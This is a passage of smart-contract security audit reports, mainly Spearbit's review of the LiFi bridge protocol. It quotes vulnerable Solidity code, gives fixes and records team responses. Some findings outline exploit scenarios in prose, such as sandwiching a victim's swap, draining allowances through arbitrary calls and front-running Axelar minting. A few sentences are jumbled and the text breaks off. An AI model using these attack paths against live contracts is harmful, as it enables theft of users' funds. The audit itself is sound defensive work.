Description: The current implementation of the AeraVaultV1 contract imports the OpenZeppelin IERC165 interface, but that interface is never used or referenced in the code.
Recommendation: Remove the import

-import "./dependencies/openzeppelin/IERC165.sol";

Gauntlet: Fixed in PR #102.
Spearbit: Acknowledged.

+5.6.21 shortfall is repeated twice in IWithdrawalValidator natspec comments
Severity: Informational
Context: IWithdrawalValidator.sol#L7-L8
Description: The word shortfall is repeated twice in the natspec comment.
Recommendation: Remove one instance of the word, following the style guide in use (max row length).
Gauntlet: Fixed in PR #101.
Spearbit: Acknowledged.

+5.6.22 Provide definition of weights & managementFee_ in the NatSpec comment
Severity: Informational
Context: AeraVaultV1.sol#L251-L259
Description: The NatSpec format is a special form of comments that provides rich documentation for functions, return variables and more. We observed an occurrence where the NatSpec comments are missing for two of the user inputs (weights & managementFee_).
Recommendation: Provide a proper definition of weights & managementFee_ in the NatSpec format comment, i.e. with @param tags, for example as sketched below.
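A minimal sketch of the missing tags; the wording is illustrative and should be checked against the actual semantics of the parameters:

/// @param weights Initial token weights of the Balancer pool.
/// @param managementFee_ Management fee rate earned by the manager.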
Gauntlet: Fixed in PR #101.
Spearbit: Acknowledged.

diff --git a/findings_newupdate/spearbit/LIFI-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/LIFI-Spearbit-Security-Review.txt
new file mode 100644
index 0000000..50f0e54
--- /dev/null
+++ b/findings_newupdate/spearbit/LIFI-Spearbit-Security-Review.txt
@@ -0,0 +1,114 @@
+5.1.1 Hardcode bridge addresses via immutable
Severity: High Risk
Context: OmniBridgeFacet.sol#L34-L106, AxelarFacet.sol#L18-L23
Description: Most bridge facets call bridge contracts where the bridge address has been supplied as a parameter. This is inherently unsafe because any address could be called. Luckily, the called function signature is hardcoded, which reduces the risk. However, it is still possible to call an unexpected function due to potential collisions of function signatures. Users might be tricked into signing a transaction for the LiFi protocol that calls unexpected contracts. One exception is the AxelarFacet, which sets the bridge addresses in initAxelar(); however this is relatively expensive as it requires an SLOAD to retrieve the bridge addresses. Note: also see "Facets approve arbitrary addresses for ERC20 tokens".

function startBridgeTokensViaOmniBridge(..., BridgeData calldata _bridgeData) ... {
    ...
    _startBridge(_lifiData, _bridgeData, _bridgeData.amount, false);
}

function _startBridge(..., BridgeData calldata _bridgeData, ...) ... {
    IOmniBridge bridge = IOmniBridge(_bridgeData.bridge);
    if (LibAsset.isNativeAsset(_bridgeData.assetId)) {
        bridge.wrapAndRelayTokens{ ... }(...);
    } else {
        ...
        bridge.relayTokens(...);
    }
    ...
}

contract AxelarFacet {
    function initAxelar(address _gateway, address _gasReceiver) external {
        ...
        s.gateway = IAxelarGateway(_gateway);
        s.gasReceiver = IAxelarGasService(_gasReceiver);
    }

    function executeCallViaAxelar(...) ... {
        ...
        s.gasReceiver.payNativeGasForContractCall{ ... }(...);
        s.gateway.callContract(destinationChain, destinationAddress, payload);
    }
}

Recommendation: Set bridge addresses in a constructor and store them as immutable variables (see the sketch below). The gas costs are low and this approach also works with delegatecall and thus the Diamond pattern. Note: The Hop bridge protocol has a separate bridge contract for each token, so it will require more complicated code, like a mapping from sendingAssetId to bridge address. See hopt.ts. Note: The Omni bridge facet calls the functions relayTokens() and wrapAndRelayTokens(), which are implemented in different contracts, so this requires some additional code, see: WETHOmnibridgeRouter.sol#L50, WETHOmnibridgeRouter, bridge. Note: this suggestion is also relevant for other addresses that are used, like the WETH address in AcrossFacet, see AcrossFacet.sol#L102.
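A minimal sketch of the recommendation, using a simplified IOmniBridge interface and illustrative function parameters; the real facet wiring will differ:

pragma solidity ^0.8.13;

interface IOmniBridge {
    function relayTokens(address token, address receiver, uint256 value) external;
}

contract OmniBridgeFacetSketch {
    // Immutables are embedded in the facet's bytecode, so this also works
    // when the facet is called via delegatecall from the Diamond.
    IOmniBridge private immutable bridge;

    constructor(IOmniBridge _bridge) {
        bridge = _bridge;
    }

    function _startBridge(address assetId, address receiver, uint256 amount) internal {
        // no user-supplied bridge address can be injected here
        bridge.relayTokens(assetId, receiver, amount);
    }
}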
LiFi: Fixed with PR #105 and PR #79.
Spearbit: Verified.

+5.1.2 Tokens are left in the protocol when the swap at the destination chain fails
Severity: High Risk
Context: AmarokFacet.sol#L55-L94, StargateFacet.sol#L149-L187, NXTPFacet.sol#L86-L117, Executor.sol#L125-L221, XChainExecFacet.sol#L17-L51
Description: The LiFi protocol finds the best bridge route for users. In some cases it helps users do a swap on the destination chain: with the help of the bridge protocols, the LiFi protocol helps users trigger swapAndCompleteBridgeTokensVia{Services} or CompleteBridgeTokensVia{Services} at the destination chain to do the swap. Some bridge services will send the tokens directly to the receiver address when the execution fails. For example, Stargate, Amarok and NXTP do the external call in a try-catch clause and send the tokens directly to the receiver when it fails. If the receiver is the Executor contract, the tokens will stay in the LiFi protocol in this scenario, and users can freely pull the tokens. Note: exploiters can pull the tokens from the LiFi protocol; please refer to the issue "Remaining tokens can be sweeped from the LiFi Diamond or the Executor", Issue #82. Exploiters can take a more aggressive strategy and force the victim's swap to revert. A possible exploit scenario:
• A victim wants to swap 10K of Optimism's BTC into Ethereum mainnet USDC.
• Since dexs on mainnet have the best liquidity, the LiFi protocol helps the user do the swap on mainnet.
• The transaction on the source chain (Optimism) succeeds and the bridge services try to call CompleteBridgeTokensVia{Services} on mainnet.
• The exploiter builds a sandwich attack to pump the BTC price. The CompleteBridgeTokens call fails since the price is bad.
• The bridge service does not revert the whole transaction. Instead, it sends the BTC on mainnet to the receiver (LiFi protocol).
• The exploiter pulls the tokens from the LiFi protocol.
Recommendation:
• Since remaining tokens are dangerous, we should try to avoid leaving tokens in the protocol address. In case the bridge services (e.g. Stargate, Connext) send tokens directly to the protocol in some edge cases, we should never set the protocol address as the receiver.
• Similar to the AxelarFacet's issue, the protocol should handle edge cases when the swap fails. Please refer to the issue "Tokens transferred with Axelar can get lost if the destination transaction can't be executed", issue #73.

We recommend implementing a receiver contract. The receiver contract is responsible for handling callbacks. Since the bridge services may send the tokens directly to the receiver contract, we should avoid unsafe external calls. A possible receiver contract could be:

contract ReceiverContract {
    ...
    function pullTokens(...) onlyOwner {
        // @audit handles edge case
        ...
    }
    ...
    function sgReceive(
        uint16,         // _srcChainId unused
        bytes memory,   // _srcAddress unused
        uint256,        // _nonce unused
        address token,
        uint256 _amountLD,
        bytes memory _payload
    ) external {
        Storage storage s = getStorage();
        if (msg.sender != s.stargateRouter) {
            revert InvalidStargateRouter();
        }
        // @audit: should use the token address from the parameters instead of assetId from the payload.
        (LiFiData memory lifiData, LibSwap.SwapData[] memory swapData, address receiver) = abi.decode(
            _payload,
            (LiFiData, LibSwap.SwapData[], address)
        );
        // @audit: optional.
        // Could skip this if the contract always clears the allowance after the external call.
        ERC20(assetId).safeApprove(address(s.executor), 0);
        ERC20(assetId).safeIncreaseAllowance(address(s.executor), _amountLD);
        bool success;
        try s.executor.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, token, receiver) {
            success = true;
        } catch {
            ERC20(token).safeTransfer(receiver, _amountLD);
            success = false;
        }
        // always clear the allowance.
        ERC20(token).safeApprove(address(s.executor), 0);
    }
}

LiFi: Fixed with PR #73.
Spearbit: Verified.

+5.1.3 Tokens transferred with Axelar can get lost if the destination transaction can't be executed
Severity: High Risk
Context: Executor.sol#L293-L316
Description: If _executeWithToken() reverts, the transaction can be retried, possibly with additional gas; see Axelar recovery. However, there is no option to return the tokens or send them elsewhere. This means that tokens would be lost if the call cannot be made to work.

contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi {
    function _executeWithToken(...) ... {
        ...
        (bool success, ) = callTo.call(callData);
        if (!success) revert ExecutionFailed();
    }
}

Recommendation: Consider sending the tokens to a recovery address in case the transaction fails. For comparison: the Connext executor has logic to do this.
LiFi: Fixed with PR #44.
Spearbit: Verified.

+5.1.4 Use the getStorage() / NAMESPACE pattern instead of global variables
Severity: High Risk
Context: Swapper.sol#L17, SwapperV2.sol#L17, DexManagerFacet.sol#L21
Description: The facet DexManagerFacet and the inherited contracts Swapper.sol / SwapperV2.sol define a global variable appStorage on the first storage slot. These two overlap, which in this case is intentional. However, it is dangerous to use this construction in a Diamond contract, as it uses delegatecall. If any other contract uses a global variable it will overlap with appStorage, with unpredictable results. This is especially important because it involves access control. For example, if the contract IAxelarExecutable.sol were to be inherited in a facet, its global variable gateway would overlap. Luckily this is currently not the case.

contract DexManagerFacet {
    ...
    LibStorage internal appStorage;
    ...
}

contract Swapper is ILiFi {
    ...
    LibStorage internal appStorage; // overlaps with DexManagerFacet, which is intentional
    ...
}

Recommendation: Use the getStorage() / NAMESPACE pattern for appStorage, as is done in other parts of the code.
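For reference, a minimal sketch of that pattern; the namespace string and struct contents are illustrative:

library LibSwapperStorageSketch {
    // unique hash, so the struct cannot collide with other facets' storage
    bytes32 internal constant NAMESPACE = keccak256("com.lifi.facets.swapper.sketch");

    struct Storage {
        mapping(address => bool) dexAllowlist;
    }

    function getStorage() internal pure returns (Storage storage s) {
        bytes32 position = NAMESPACE;
        // point the struct at an explicit slot instead of slot 0
        assembly {
            s.slot := position
        }
    }
}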
LiFi: We will refactor the underlying functionality into a Library that uses the getStorage() pattern. Refactored with PR #43.
Spearbit: Verified.

+5.1.5 Decrease allowance when it is already set to a non-zero value
Severity: High Risk
Context: AxelarFacet.sol#L71, LibAsset.sol#L52, FusePoolZap.sol#L64, Executor.sol#L312
Description: Non-standard tokens like USDT revert the transaction when a contract or a user tries to approve an allowance while the spender's allowance is already set to a non-zero value. For that reason, the previous allowance should be reset to zero before increasing the allowance in the related functions.
• Performing a direct overwrite of the value in the allowances mapping is susceptible to front-running scenarios by an attacker (e.g., an approved spender). As OpenZeppelin mentions, safeApprove should only be called when setting an initial allowance or when resetting it to zero.

function safeApprove(
    IERC20 token,
    address spender,
    uint256 value
) internal {
    // safeApprove should only be called when setting an initial allowance,
    // or when resetting it to zero. To increase and decrease it, use
    // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'
    require(
        (value == 0) || (token.allowance(address(this), spender) == 0),
        "SafeERC20: approve from non-zero to non-zero allowance"
    );
    _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));
}

There are four instances of this issue:
• AxelarFacet.sol directly uses the approve function, which does not check the return value of the external call. The facet should utilize the LibAsset.maxApproveERC20() function like the other facets.
• LibAsset's LibAsset.maxApproveERC20() function is used in the other facets. USDT's approval mechanism, for instance, reverts if the current allowance is non-zero. For that reason, the function should approve zero first, or safeIncreaseAllowance can be utilized.
• FusePoolZap.sol also uses the approve function, which does not check the return value. The contract does not import any other libraries; that being the case, the contract should use the safeApprove function, approving zero first.
• Executor.sol directly uses the approve function, which does not check the return value of the external call. The contract should utilize the LibAsset.maxApproveERC20() function like the other contracts.
Recommendation: Approve a zero amount first before setting the actual amount, or utilize safeIncreaseAllowance in the LibAsset.maxApproveERC20() function, for example as sketched below.
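A minimal sketch of such a helper, assuming OpenZeppelin's SafeERC20 (v4) is imported; this is illustrative, not the exact LibAsset implementation:

library LibAssetSketch {
    using SafeERC20 for IERC20;

    function maxApproveERC20(
        IERC20 token,
        address spender,
        uint256 amount
    ) internal {
        if (token.allowance(address(this), spender) < amount) {
            // reset first: tokens like USDT revert on non-zero -> non-zero approvals
            token.safeApprove(spender, 0);
            token.safeApprove(spender, type(uint256).max);
        }
    }
}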
LiFi: Fixed with PR #10.
Spearbit: Verified.

+5.1.6 Too generic calls in GenericBridgeFacet allow stealing of tokens
Severity: High Risk
Context: GenericBridgeFacet.sol#L69-L120, LibSwap.sol#L30-L68
Description: In the contract GenericBridgeFacet, the functions swapAndStartBridgeTokensGeneric() (via LibSwap.swap()) and _startBridge() allow arbitrary function calls, which allows anyone to call transferFrom() and steal tokens from anyone who has given a large allowance to the LiFi protocol. This has been used to hack LiFi in the past. The following risks are also present:
• call the LiFi Diamond itself via functions that don't have nonReentrant.
• perhaps cancel transfers of other users.
• call functions that are protected by a check on this, like completeBridgeTokensViaStargate.

contract GenericBridgeFacet is ILiFi, ReentrancyGuard {
    function swapAndStartBridgeTokensGeneric(
        ...
        LibSwap.swap(_lifiData.transactionId, _swapData[i]);
        ...
    }

    function _startBridge(BridgeData memory _bridgeData) internal {
        ...
        (bool success, bytes memory res) = _bridgeData.callTo.call{ value: value }(_bridgeData.callData);
        ...
    }
}

library LibSwap {
    function swap(bytes32 transactionId, SwapData calldata _swapData) internal {
        ...
        (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue }(_swapData.callData);
        ...
    }
}

Recommendation: Whitelist the external call addresses and function signatures for both the dexes and the bridges. Note: SwapperV2 already contains whitelist functionality for dexes, but it isn't used from this contract. Alternatively, make sure this code isn't added to the LiFi Diamond anymore, for example by removing the code from the repository and/or adding a warning inside the code itself.
LiFi: It has been removed from all contract deployments since the exploit. We do not plan to enable it again, so we can remove it from the repository. PR #4.
Spearbit: The issue is solved by deleting the GenericBridgeFacet contract.

+5.1.7 LiFi protocol isn't hardened
Severity: High Risk
Context: Lifi src
Description: The usage of the LiFi protocol depends largely on off-chain APIs. It takes all values, fees, limits, chain ids and addresses to be called from the APIs and doesn't verify them. Several elements are not connected via smart contracts but via the API, for example:
• the emits of LiFiTransferStarted versus the bridge transactions.
• the fees paid to the FeeCollector versus the bridge transactions.
• the Periphery contracts as defined in the PeripheryRegistryFacet versus the rest.
In case the API and/or frontend contain errors or are hacked, tokens could easily be lost. Also, when calling the LiFi contracts directly or via other smart contracts, it is rather trivial to commit mistakes and lose tokens. Emitted data can easily be disturbed by malicious actors, making it unusable. The payment of fees can easily be circumvented by accessing the contracts directly. It is easy to make fake websites which trick users into signing transactions which seem to be for LiFi but result in losing tokens. With the current design, the power of smart contracts isn't used, and it introduces numerous risks as described in the rest of this report.
Recommendation: Determine if you want the LiFi protocol also to be used at a smart contract level (e.g. to be integrated in other smart contracts).
• If so: then harden the functions and connect them.
• If not: then add access controls and/or verification checks in all the bridge functions to verify that transactions and values only originate from the LiFi APIs. This can be done by signing data or whitelisting the calling addresses.
LiFi: After discussing this internally, we have decided that for now we plan to keep the protocol as is and rely on the API to generate correct behavior. We don't plan to lock the protocol down in such a way as to prevent developers from using the contracts freely. We acknowledge the risks inherent in that and plan to mitigate as much as possible without a full lockdown.
Spearbit: Acknowledged.

+5.1.8 Bridge with Axelar can be stolen with malicious external call
Severity: High Risk
Context: Executor.sol#L272-L288, Executor.sol#L323-L333, Executor.sol#L269-L288
Description: The Executor contract allows users to build an external call with an arbitrary payload to any address except address(erc20Proxy). However, erc20Proxy is not the only dangerous address to call: by building a malicious external call to the Axelar gateway, exploiters can steal users' funds. The Executor does swaps on the destination chain; by setting the receiver address to the Executor contract on the destination chain, Li-Fi can help users get the best price.
Executor inherits IAxelarExecutable. execute and executeWithToken validate the payload and execute the external call. IAxelarExecutable.sol#L27-L40:

function executeWithToken(
    bytes32 commandId,
    string calldata sourceChain,
    string calldata sourceAddress,
    bytes calldata payload,
    string calldata tokenSymbol,
    uint256 amount
) external {
    bytes32 payloadHash = keccak256(payload);
    if (!gateway.validateContractCallAndMint(commandId, sourceChain, sourceAddress, payloadHash, tokenSymbol, amount))
        revert NotApprovedByGateway();
    _executeWithToken(sourceChain, sourceAddress, payload, tokenSymbol, amount);
}

The nuance lies in the Axelar gateway, AxelarGateway.sol#L133-L148. Once the receiver calls validateContractCallAndMint with a valid payload, the gateway mints the tokens to the receiver and marks the payload as executed. It is the receiver contract's responsibility to execute the external call. Exploiters can build a malicious external call that triggers validateContractCallAndMint, and the Axelar gateway would mint the tokens to the Executor contract. The exploiter can then pull the tokens from the Executor contract. A possible exploit scenario:
1. The exploiter builds a malicious external call: token.approve(address(exploiter), type(uint256).max).
2. A victim user uses the AxelarFacet to bridge tokens. Since the destination bridge has the best price, the user sets the receiver to address(Executor) and finishes the swap with this.swapAndCompleteBridgeTokens.
3. The exploiter observes the victim's bridge tx and builds an external call to trigger gateway.validateContractCallAndMint. The Executor contract gets the minted tokens. The exploiter can pull the minted tokens from the Executor contract since there is a max allowance.
4. The victim calls Executor.execute() with the valid payload. However, since the payload has already been triggered by the exploiter, it is no longer valid.
Recommendation: Allowing users to build arbitrary external calls is dangerous, especially when Li-Fi supports a variety of bridges and chains: there are nuances in the different bridge services and in chains' precompiled contracts. We recommend using a whitelist in the Executor contract, like in the main contract. An alternative way to support arbitrary function calls is to separate the IAxelarExecutable logic from the Executor contract, and never set Axelar's receiver to the Executor contract.
LiFi: Fixed with PR #12.
Spearbit: Verified.

5.2 Medium Risk

+5.2.1 LibSwap may pull tokens that are different from the specified asset
Severity: Medium Risk
Context: LibSwap.sol#L30-L55
Description: LibSwap.swap is responsible for doing swaps. It is designed to swap one asset at a time. The _swapData.callData is provided by the user, and the LiFi protocol only checks its signature. As a result, users can build calldata that swaps a different asset than specified. For example, a user can set fromAssetId = dai and provide addLiquidity(usdc, dai, ...) as call data. The Uniswap router would then pull usdc and dai at the same time. If there were remaining tokens left in the LiFi protocol, users could sweep tokens from the protocol.

library LibSwap {
    function swap(bytes32 transactionId, SwapData calldata _swapData) internal {
        ...
        if (!LibAsset.isNativeAsset(fromAssetId)) {
            LibAsset.maxApproveERC20(IERC20(fromAssetId), _swapData.approveTo, fromAmount);
            if (toDeposit != 0) {
                LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit);
            }
        } else {
            nativeValue = fromAmount;
        }
        // solhint-disable-next-line avoid-low-level-calls
        (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue }(_swapData.callData);
        if (!success) {
            string memory reason = LibUtil.getRevertMsg(res);
            revert(reason);
        }
    }

Recommendation: We recommend clearing the allowance after the external call.

if (!LibAsset.isNativeAsset(fromAssetId)) {
    LibAsset.maxApproveERC20(IERC20(fromAssetId), _swapData.approveTo, fromAmount);
    if (toDeposit != 0) {
        LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit);
    }
} else {
    nativeValue = fromAmount;
}
// solhint-disable-next-line avoid-low-level-calls
(bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue }(_swapData.callData);
// @audit: clear the allowance
IERC20(fromAssetId).safeApprove(_swapData.approveTo, 0);
if (!success) {
    string memory reason = LibUtil.getRevertMsg(res);
    revert(reason);
}

LiFi: The LiFi team acknowledges the risk but will encourage users to utilize our API and pass correct calldata, rather than strictly checking this at the contract level.
Spearbit: Acknowledged.

+5.2.2 Check slippage of swaps
Severity: Medium Risk
Context: OmniBridgeFacet.sol#L63-L65
Description: Several bridges check that the output of swaps isn't 0. However, it could also happen that swaps give a positive output that is still lower than expected due to slippage / sandwiching / MEV. Several AMMs will have a mechanism to limit slippage, but it might be useful to add a generic mechanism, as multiple swaps in sequence might have a relatively large combined slippage.

function swapAndStartBridgeTokensViaOmniBridge(...) ... {
    ...
    uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender));
    if (amount == 0) {
        revert InvalidAmount();
    }
    _startBridge(_lifiData, _bridgeData, amount, true);
}

Recommendation: Consider adding a slippage check by specifying a minimum amount of expected tokens, as sketched below. At least add a check for amount == 0 in all bridges.
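A minimal sketch of such a check, assuming a hypothetical _minAmount parameter added to the swap-and-bridge entry points and an illustrative SlippageTooHigh error:

error SlippageTooHigh(uint256 received, uint256 minimum);

function swapAndStartBridgeTokensViaOmniBridge(..., uint256 _minAmount) ... {
    ...
    uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender));
    // covers both the zero-output case and partial output due to slippage/MEV
    if (amount == 0 || amount < _minAmount) revert SlippageTooHigh(amount, _minAmount);
    _startBridge(_lifiData, _bridgeData, amount, true);
}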
LiFi: Fixed with PR #75.
Spearbit: Verified.

+5.2.3 Replace createRetryableTicketNoRefundAliasRewrite() with depositEth()
Severity: Medium Risk
Context: ArbitrumBridgeFacet.sol#L90-L137
Description: The function _startBridge() of the ArbitrumBridgeFacet uses createRetryableTicketNoRefundAliasRewrite(). According to the docs (address-aliasing), this method skips some of the address rewrite magic that depositEth() does. Normally depositEth() should be used, according to the docs (depositing-and-withdrawing-ether). Also, this method will be deprecated after Nitro: Inbox.sol#L283-L297. While the bridge doesn't do the checks of depositEth(), it is easy for developers who call the LiFi contracts directly to make mistakes and lose tokens.

function _startBridge(...) ... {
    ...
    if (LibAsset.isNativeAsset(_bridgeData.assetId)) {
        gatewayRouter.createRetryableTicketNoRefundAliasRewrite{ value: _amount + cost }(...);
    }
    ...
}

Recommendation: Replace createRetryableTicketNoRefundAliasRewrite() with depositEth().
LiFi: In principle, retryable tickets can alternatively be used to deposit Ether; this could be preferable to the special eth-deposit message type if, e.g., more flexibility for the destination address is needed, or if one wants to trigger the fallback function on the L2 side. Reverted with PR #79.
Spearbit: Verified.

+5.2.4 Hardcode or whitelist the Axelar destinationAddress
Severity: Medium Risk
Context: AxelarFacet.sol#L30-L89
Description: The functions executeCallViaAxelar() and executeCallWithTokenViaAxelar() call a destinationAddress on the destinationChain. This destinationAddress needs to have the specific Axelar functions (_execute() and _executeWithToken()) to be able to receive the calls. These are implemented in the Executor. If these functions don't exist at the destinationAddress, the transferred tokens will be lost.

/// @param destinationAddress the address of the LiFi contract on the destinationChain
function executeCallViaAxelar(..., string memory destinationAddress, ...) ... {
    ...
    s.gateway.callContract(destinationChain, destinationAddress, payload);
}

Note: the comment "the address of the LiFi contract" isn't clear; it could either be the LiFi Diamond or the Executor.
Recommendation: Hardcode or whitelist the destinationAddress. Double-check the @param comment for destinationAddress (for both functions).
LiFi: We acknowledge the risk and recommend all users utilize our API in order to pass correct data; they pass invalid contract addresses at their own risk.
Spearbit: Acknowledged.

+5.2.5 WormholeFacet doesn't send native token
Severity: Medium Risk
Context: WormholeFacet.sol#L36-L103
Description: The functions of WormholeFacet allow sending the native token; however, they don't actually send it across the bridge, causing the native token to stay stuck in the LiFi Diamond and get lost for the sender.

contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper {
    function startBridgeTokensViaWormhole(...) ... payable ... { // is payable
        LibAsset.depositAsset(_wormholeData.token, _wormholeData.amount); // allows native token
        _startBridge(_wormholeData);
        ...
    }

    function _startBridge(WormholeData memory _wormholeData) private {
        ...
        LibAsset.maxApproveERC20(...); // geared towards ERC20, also works when `msg.value` is set
        // no { value: .... }
        IWormholeRouter(_wormholeData.wormholeRouter).transferTokens(...);
    }
}

Recommendation: Remove the payable keyword and/or check msg.value == 0. Alternatively, support sending the native token. This can be done via wrapAndTransferETH() of the Wormhole bridge. Note: also see issue "Consider using wrapped native token".
LiFi: Fixed with PR #76.
Spearbit: Verified.

+5.2.6 ArbitrumBridgeFacet does not check if msg.value is enough to cover the cost
Severity: Medium Risk
Context: ArbitrumBridgeFacet.sol#L97-L121
Description: The ArbitrumBridgeFacet does not check whether the user-provided ether (msg.value) is enough to cover _amount + cost. If there is remaining ether in LiFi's LibDiamond address, exploiters can set a large cost and sweep the ether.

function _startBridge( ... ) private {
    ...
    uint256 cost = _bridgeData.maxSubmissionCost + _bridgeData.maxGas * _bridgeData.maxGasPrice;
    if (LibAsset.isNativeAsset(_bridgeData.assetId)) {
        gatewayRouter.createRetryableTicketNoRefundAliasRewrite{ value: _amount + cost }( ... );
    } else {
        gatewayRouter.outboundTransfer{ value: cost }( ... );
    }

Recommendation: Always check that the inbound ether is enough to cover the outbound ether (see the sketch after the case list below). There are different possible cases:
• startBridgeTokensViaArbitrumBridge and assetId != NATIVE_ASSET:
  – check msg.value > cost
• startBridgeTokensViaArbitrumBridge and assetId == NATIVE_ASSET:
  – check msg.value > cost + amount
• swapAndStartBridgeTokensViaArbitrumBridge and assetId != NATIVE_ASSET:
  – calculate received_ether = post_swap_ether - pre_swap_ether and check received_ether > cost
• swapAndStartBridgeTokensViaArbitrumBridge and assetId == NATIVE_ASSET:
  – calculate received_ether = post_swap_ether - pre_swap_ether and check received_ether > amount + cost
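A minimal sketch covering the first two cases, with an illustrative InvalidMsgValue error; the swap cases would compare against the ether received from the swap instead of msg.value:

error InvalidMsgValue(uint256 provided, uint256 required);

uint256 cost = _bridgeData.maxSubmissionCost + _bridgeData.maxGas * _bridgeData.maxGasPrice;
uint256 required = LibAsset.isNativeAsset(_bridgeData.assetId) ? _amount + cost : cost;
// reject transactions that would be subsidized by ether already in the Diamond
if (msg.value < required) revert InvalidMsgValue(msg.value, required);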
Also see: "Remaining tokens can be sweeped from the LiFi Diamond or the Executor" contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _executeWithToken(...) ... { ... // transfer received tokens to the recipient IERC20(tokenAddress).approve(callTo, amount); (bool success, ) = callTo.call(callData); ... } } Recommendation: Consider sending the remaining tokens to a recovery address. Document the token handling in AxelarFacet.md LiFi: Fixed with PR #62. Spearbit: Verified. 19 +5.2.10 Remaining tokens can be sweeped from the LiFi Diamond or the Executor Severity: Medium Risk Context: Executor.sol#L143-L149, Executor.sol#L191-L199, Executor.sol#L242-L249, Executor.sol#L338-L345 Description: The initial balance of (native) tokens in both the Lifi Diamond and the Executor contract can be sweeped by all the swap functions in all the bridges, which use the following functions: • swapAndCompleteBridgeTokensViaStargate() of Executor.sol • swapAndCompleteBridgeTokens() of Executor.sol • swapAndExecute() of Executor.sol • _executeAndCheckSwaps() of SwapperV2.sol • _executeAndCheckSwaps() of Swapper.sol • swapAndCompleteBridgeTokens() of XChainExecFacet Although these functions ... • swapAndCompleteBridgeTokensViaStargate() of Executor.sol • swapAndCompleteBridgeTokens() of Executor.sol • swapAndExecute() of Executor.sol • swapAndCompleteBridgeTokens() of XChainExecFacet have the following code: if (!LibAsset.isNativeAsset(transferredAssetId)) { startingBalance = LibAsset.getOwnBalance(transferredAssetId); // sometimes transfer tokens in } else { startingBalance = LibAsset.getOwnBalance(transferredAssetId) - msg.value; } // do swaps uint256 postSwapBalance = LibAsset.getOwnBalance(transferredAssetId); if (postSwapBalance > startingBalance) { LibAsset.transferAsset(transferredAssetId, receiver, postSwapBalance - startingBalance); } This doesn’t protect the initial balance of the first tokens, because it can just be part of a swap to another token. The initial balances of intermediate tokens are not checked or protected. As there normally shouldn’t be (native) tokens in the LiFi Diamond or the Executor the risk is limited. Note: set the risk to medium as there are other issues in this report that leave tokens in the contracts Although in practice there is some dust in the LiFi Diamond and the Executor: • 0x362fa9d0bca5d19f743db50738345ce2b40ec99f • 0x46405a9f361c1b9fc09f2c83714f806ff249dae7 Recommendation: Consider whether any tokens left in the LiFi Diamond and the Executor should be taken into account. • If so: for every (intermediate) swap determine initial amount of (native) token and make sure this isn’t swapped. • If not: remove the code with the startingBalance. also analyse all occurances of tokens in the LiFi Diamond and the Executor to determine its source. LiFi: Fixed with PR #94. Spearbit: Verified. 20 +5.2.11 Wormhole bridge chain IDs are different than EVM chain IDs Severity: Medium Risk Context: WormholeFacet.sol#L93 Description: According to documentation, Wormhole uses different chain ids than EVM based chain ids. However, the code is implemented with block.chainid check. LiFi is integrated with third party platforms through API. The API/UI side can implement chain id checks, but direct interaction with the contract can lead to loss of funds. 
function _startBridge(WormholeData memory _wormholeData) private { if (block.chainid == _wormholeData.toChainId) revert CannotBridgeToSameNetwork(); } From other perspective, the following line limits the recipient address to an EVM address. done to a non EVM chain (e.g. Solana, Terra, Terra classic), then the tokens would be lost. If a bridge would be ... bytes32(uint256(uint160(_wormholeData.recipient))) ... Example transactions below. • Chainid 1 Solana • Chainid 3 Terra Classic On the other hand, the usage of the LiFi protocol depends largely on off chain APIs. It takes all values, fees, limits, chain ids and addresses to be called from the APIs. As previously mentioned, the wormhole destination chain ids are different than standard EVM based chains, the following event can be misinterpreted. ... emit LiFiTransferStarted( _lifiData.transactionId, "wormhole", "", _lifiData.integrator, _lifiData.referrer, _swapData[0].sendingAssetId, _lifiData.receivingAssetId, _wormholeData.recipient, _swapData[0].fromAmount, _wormholeData.toChainId, // It does not show correct chain id which is expected by LiFi Data Analytics true, false ,! ); ... Recommendation: Consider having a mapping of the EVM chainid to the wormhole chainid, so a smart contract user (developer) of the lifi protocol can always use the same chainid. If tokens are accidentally sent to the wrong chain they might be unrecoverable. For instance, if the destination is a smart contract that isn’t deployed on that chain. LiFi: Fixed with PR #29. Spearbit: Verified. 21 +5.2.12 Facets approve arbitrary addresses for ERC20 tokens Severity: Medium Risk AcrossFacet.sol#L103, ArbitrumBridge- Context: Facet.sol#L111, GnosisBridgeFacet.sol#L119, HopFacet.sol#L106, HyphenFacet.sol#L101, NXTPFacet.sol#L127, OmniBridgeFacet.sol#L88, OptimismBridge- Facet.sol#L100, PolygonBridgeFacet.sol#L101, StargateFacet.sol#L229, WormholeFacet.sol#L94 GenericBridgeFacet.sol#L111, AnyswapFacet.sol#L127, CBridgeFacet.sol#L103, AmarokFacet.sol#L145, Description: All the facets pointed above approve an address for an ERC20 token, where both these values are provided by the user: LibAsset.maxApproveERC20(IERC20(token), router, amount); The parameter names change depending on the context. So for any ERC20 token that LifiDiamond contract holds, user can: • call any of the functions in these facets to approve another address for that token. • use the approved address to transfer tokens out of LifiDiamond contract. Note: normally there shouldn’t be any tokens in the LiFi Diamond contract so the risk is limited. Note: also see "Hardcode bridge addresses via immutable" Recommendation: For each bridge facet, the bridge approval contract address is already known. Store these addresses in an immutable or a storage variable instead of taking it as a user input. Only approve and interact with these pre-defined addresses. LiFi: Fixed with PR #79, PR #102, PR #103 Spearbit: Verified. +5.2.13 FeeCollector not well integrated Severity: Medium Risk Context: FeeCollector.sol Description: There is a contract to pay fees for using the bridge: FeeCollector. This is used by crafting a transaction by the frontend API, which then calls the contract via _executeAndCheckSwaps(). Here is an example of the contract Here is an example of the contract of such a transaction Its whitelisted here This way no fees are paid if a developer is using the LiFi contracts directly. Also it is using a mechanism that isn’t suited for this. 
